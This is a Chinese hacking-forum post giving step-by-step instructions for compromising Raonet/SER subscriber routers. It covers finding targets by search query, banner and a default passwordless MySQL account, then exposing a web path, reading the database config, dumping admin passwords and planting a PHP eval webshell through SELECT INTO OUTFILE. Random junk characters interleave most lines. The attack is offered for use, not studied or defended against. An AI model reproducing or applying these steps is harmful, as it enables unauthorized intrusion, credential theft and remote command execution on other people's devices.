寻找存在漏洞的路由器方法:3 y/ W" q2 J; F! F8 d
$ n- D8 B, t: p: S6 E; P: c6 s
1:google搜索'Raonet Subscriber Ethernet Router'+ J" {4 d$ o8 ?3 a) e. h
: v* ^ n3 `( O! w% h' ~# b. _8 M
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 Q6 f+ Y6 b+ F) a( [7 X4 t
2 q% r2 w5 S8 A2 w" H9 z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。) S1 T. H$ K9 ], p1 A- q
1 u7 ^1 o9 F: }) P( h
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
- u9 ^3 R% d. V+ k" j! I+ i
( F( ]7 a; ^8 Q 9 B! p# _+ q. [5 X* b
C [! U* c" e1 k( I
入侵步骤:
6 ]( @: ~( w) I1 ~# Y, S( j- |1 M7 j3 {7 Y+ I- f# q
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
/ {3 g' a* @) V( _( y" ?9 J' t3 l& M
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
6 T( v& r, O# V- W$ q. Y3:得到密码后连接,查看GUI管理密码:
, A6 T0 w. _! g3 ^ z* s( l3 ?use ser_5007 x, R4 M* j( z
select id,passwd from user;
& d4 \ R9 K6 m; f4:通过数据库写入webshell,执行命令:- R- F( [9 h% ^0 f w- v4 C3 {8 k& X
use mysql;" O5 Z6 k/ Q' y! O3 O, |
create table ok(cmd TEXT);
1 l6 T5 q& p( w/ O6 Z, H; n+ Z3 ]insert into ok values("<?php @eval($_POST[cmd])?>");
2 L3 h# B; e c! O& `select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
+ p: }. d8 {* J' I! e& H' Qdrop table ok;) m) u( {* x/ `7 I" C
( s( Q5 K5 A4 D& u+ z) z5:连接后门shell.php : B n9 U2 S" q1 ^! i
8 {% ?/ {$ y( E. Q' a$ F U$ V
6. 搞定!
, ]3 M+ d5 S) k( J8 b
# u2 |; y; @9 _- X |